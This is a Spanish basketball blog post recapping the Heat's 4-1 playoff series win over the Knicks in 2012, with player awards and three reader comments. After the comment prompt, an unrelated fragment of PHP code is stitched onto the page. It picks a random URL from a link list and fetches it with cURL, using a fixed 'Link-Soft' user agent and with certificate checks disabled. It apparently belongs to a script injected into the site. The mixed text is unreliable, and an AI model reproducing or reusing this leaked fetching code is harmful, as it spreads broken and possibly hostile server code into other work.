Resumen Heat 4 – Knicks 1

11 de May de 2012 por TheDeerHunter

Análisis de la eliminatoria

Poco que analizar. Ya se sabía que los Heat, en condiciones normales, son superiores. Lo habían demostrado en la regular ganando todos sus duelos. Peor lo tenían los Knicks si empezaban sin Lin, perdían a Shumphert y Baron, el mejor defensor de la liga pillaba la gripe, el incidente del extintor… ¿algo más para “los pupas” de la NBA? Nos da que la diferencia de 100 a 67 del primero es más representativa que cualquier otro resultado.

Lo curioso quizás es que no haya habido barrida. Se interpreta más como un punto de piedad y de relajación de Miami que otra cosa, porque es difícil no pensar que si hubieran apretado un poco habrían dejado a 0. Añadiría que sólo hemos podido ver la verdadera cara de los Heat en el primer partido. En Nueva York tenemos una extraña mezcla de los peores defectos de los anteriores Nuggets con la desgracia de los Knicks. Sin la cabeza de George Karl pero con un punto de defensa “made in Woodson&Chandler” que no han podido aplicar inflados a contragolpes. Uno de los peores duetos de “all stars” de la historia, la ciclotímica solvencia de J.R. Smith, un par de exjugadores en activo y el mejor defensor del año que ni siquiera ha podido aportar. Esta es la radiografía de una calamidad a la que sólo el milagro Lin pudo insuflar una dosis de positivismo.

El trabajo de los Heat fue muy simple: Complicarle la vida a Carmelo y darle ritmo a las contras aprovechando cada error rival, que han sido muchos. Como decimos, apenas hemos podido vislumbrar de qué pie cojean este año. Dudamos si lo podremos analizar en el siguiente cruce.

PREMIOS

MVP: LeBron James sobradito, delante y detrás, en un duelo mucho más desigual en la realidad que sobre al papel con Melo. Casi 28 ptos, más de 6 rebotes, casi 6 asistencias, más de 2 robos y un importante etcétera de aportación no numérica. Demoledor.

Sorpresa: Más que digna primera ronda de Mario Chalmers. Es menos sorpresa, porque ha cuajado un año más que aceptable.

Decepción: Qué podemos decir de Amaré Stoudemire. Podemos hablar de lo mal que ha combinado la parejita, pero suyo es buena parte del mérito. Su temporada ha sido un desastre, pero aún ha logrado empeorarlo estos playoffs. No supera ni a un extintor.

Esfuerzo en vano: Si decimos 28 puntos por partido, más de 8 rebotes, 2 asistencias y 1 robo podemos pensar que son números impresionantes. Lo malo es que en el caso de Carmelo Anthony no siempre se traduce en un beneficio real para los suyos.

Comenta

3 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Deer, el resumen de los Celtics está calentito en el horno. En nada lo saco y se lo paso a Txus ok? No te curres esa eliminatoria que ya estoy yo confabulando mis idas de ollas con carne y patatas, ejjee.

    Por otra parte, 4-1 fácil para los Heat. Otra que acierto. Regaláis piruletas o algo? jeje. Pobre Knicks, no saben adónde van. El trozo de mano colgando de Stoudamire resume todo. Impotencia es la palabra

      Citar

  2. Rompe dice:
    #2

    Se confirma, MVP de la Regular para el tito LeBron, lo que lo mete directamente entre los mejores jugadores de la historia, individualmente hablando. Se pone al nivel de Moses Malone, Magic Johnson y Larry Bird, y únicamente por detrás de Chamberlain, Russel Jordan y Jabbar, palabras mayores…

      Citar

  3. GreenPride dice:
    #3

    Bueno, pues verdaderamente una eliminatoria con muy poca historia. Como suponíamos en la previa Melo lo ha pasado muy mal ante la defensa de LeBron-Battier y estando demasiado sólo en ataque como para poder descargarse de responsabilidad y aprovecharse del trabajo de otros compañeros. Sólo en los 2 últimos partidos ha estado a gran nivel y les ha servido al menos para ganar un partido lo que ya es mucho. Si ya de por sí los Knicks era carne de eliminación con todos sanos si además se te lesionan Shumpert y Davis, Chandler juega con fiebre y Amare se dedica a hacer el tonto pues ya apaga y vámonos. Para los Heat ha sido un aperitivo de lo que debe ser una serie mucho más complicada contra los Pacers. Veremos cómo se comportan cuando lleguen los partidos duros pero de momento nada que objetar a un equipo en el Wade y LeBron se entienden mucho mejor este año, Bosh cumple su función de tercer espada en ataque y las ayudas de la intendencia (Haslem, Chalmers, Battier, Miller) parecen estar mucho más a punto que el año pasado. Son clarísimos favoritos en el Este para llegar a las finales visto el fiasco de lesiones de los Bulls y veremos si Pacers o ¿Celtics? pueden hacerles sudar y crearles dudas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>